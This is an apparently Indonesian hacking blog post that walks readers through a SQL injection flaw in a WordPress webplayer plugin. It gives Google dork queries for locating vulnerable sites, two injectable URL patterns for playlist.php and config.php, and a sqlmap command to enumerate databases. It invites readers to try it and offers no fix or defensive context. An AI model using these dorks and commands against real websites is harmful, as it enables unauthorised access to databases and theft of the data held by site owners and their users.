Assalamualaikum Wr.Wb.
dengan diberikan nikmat dan rezeki dari Allah SWT , saya Mr.GagalTotal666 akan share suatu celah pada Wordpress yaitu Wordpress webplayer Plugins SQL Injection Vulnerability tes di BackBox Linux.
ikuti langkah berikut jika anda ingin mencoba :
Dork 1 : inurl:/wp-content/plugins/webplayer/playlist.php?videoid=
Dork 2 : inurl:/wp-content/plugins/webplayer/config.php?id=
Exploit/Poc 1 :
http://127.0.0.1/[PATH]/wp-content/plugins/hd-webplayer/playlist.php?videoid=[SQL]Exploit/Poc 2 :
http://127.0.0.1/[PATH]/wp-content/plugins/hd-webplayer/config.php?id=[SQL]
Poc SqlMap :
sqlmap -u "http://127.0.0.1/[PATH]/wp-content/plugins/hd-webplayer/playlist.php?videoid=[SQL]" --dbs
kalau anda kurang paham silakan simak video dibawah ini :
mohon maaf bila video masih ada kesalahan dan kekurangan ^_^ saya juga masih belajar
sekian tutorial nya mengenai vlun SQLI pada Wordpress ^_^
semoga bermanfaat ^_^
Wassalamualaikum Wr.Wb.....
0 Comments